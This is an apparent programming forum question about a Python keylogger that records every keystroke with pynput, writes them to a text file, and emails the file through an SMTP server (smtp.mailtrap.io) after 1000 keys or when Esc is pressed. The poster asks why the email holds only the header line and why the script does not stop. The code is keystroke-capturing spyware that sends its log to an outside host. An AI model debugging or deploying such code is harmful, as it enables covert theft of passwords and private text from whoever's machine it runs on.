# This key logger script returns to the top even though I put a return False and does not send anything

Tags: python

This is a simple keylogger script that i am trying out. It writes the keylogged letters onto a txt file and send it to a Mailtrap email.

```
import pynput
import os
import smtplib
from os.path import basename
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication

with open("log.txt", "a") as file:
    file.write("Logging: \n")

sender = "Private Person <from@example.com>"
receiver = "A Test User <to@example.com>"


msg = MIMEMultipart()

msg['Subject'] = 'Test mail with attachment'
msg['From'] = 'admin@example.com'
msg['To'] = 'info@example.com'

filename = 'log.txt'
with open(filename, 'r') as f:
    part = MIMEApplication(f.read(), Name=basename(filename))

part['Content-Disposition'] = 'attachment; filename="{}"'.format(basename(filename))
msg.attach(part)



from pynput.keyboard import Key, Listener

count=0
keys= []

def on_press(key):
    global keys, count

    keys.append(key)
    count +=1
    print("(0)pressed".format(key))

    if count >= 1:
        write_file(keys)
        keys= []

    if count == 1000:
        with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
            server.login("Email", "Password")
#I replaced the login information with "Email" and "Password"
            server.sendmail(sender, receiver, msg.as_string())
            print("Successfully sent email")
        open("log.txt", "a")




def write_file(keys):
    with open("log.txt", 'a') as f:
        for key in keys:
            k = str(key).replace("'","")
            if k.find("space") > 0:
                f.write(' ')
            elif k.find("Key") == -1:
                f.write(k)
            if k.find("enter") > 0:
                f.write('\n')






def on_release(key):
    if key == Key.esc:

        with open("log.txt", "a") as file:
            file.write("End Of Log: \n")

        with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
            server.login("Email", "Password")
            server.sendmail(sender, receiver, msg.as_string())
            print("Successfully sent email")
            open("log.txt", "w")

        return False;

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

input("Press enter to continue...")
```

When I press esc which send the txt to the email, it does not show the logged text and only shows "logging:" which I put at the start of each log. It should work if I put a return False to stop th script but It does not affect the script. I also tested swotching around the `"open("log.txt", "")"` with the different choices with no luck.